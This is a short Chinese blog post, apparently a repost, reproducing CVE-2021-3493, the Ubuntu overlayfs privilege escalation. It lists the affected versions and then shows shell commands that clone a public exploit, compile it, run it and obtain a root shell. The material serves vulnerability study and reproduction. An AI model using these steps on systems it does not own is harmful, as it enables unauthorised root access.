CVE-2021-3493漏洞复现

本文转载自查看原文 2021-04-28 23:52 380 渗透测试

漏洞简介

Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题，由于没有正确的验证文件系统功能在用户名称空间中的应用，从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限

影响版本

ubuntu 20.04

ubuntu 16.04

ubuntu18.04

ubuntu 14.04

本次复现为ubuntu20.04版本

漏洞复现

test@linux:~# git clone https://github.com/ASkyeye/CVE-2021-3493.git
test@linux:~$ cd CVE-2021-3493/
test@linux:~/CVE-2021-3493$ gcc exploit.c -o exploit
test@linux:~/CVE-2021-3493$ chmod u+x exploit
test@linux:~/CVE-2021-3493$ ./exploit
bash-5.0$ whoami
root

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CVE-2021-1675漏洞复现 Linux sudo权限提升漏洞（CVE-2021-3156）复现 [权限提升] CVE-2021-3156 Linux sudo 漏洞复现 CVE-2021-22205 Gitlab远程命令执行漏洞复现 CVE-2021-3156 sudo提权漏洞复现 CVE-2021-3129：Laravel远程代码漏洞复现分析 CVE-2021-41773 Apache Httpd Server 漏洞复现【漏洞复现】CVE-2021-22205 GitLab 未授权RCE 2021-log4j2漏洞复现CVE-2021-44228-反弹shell 【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞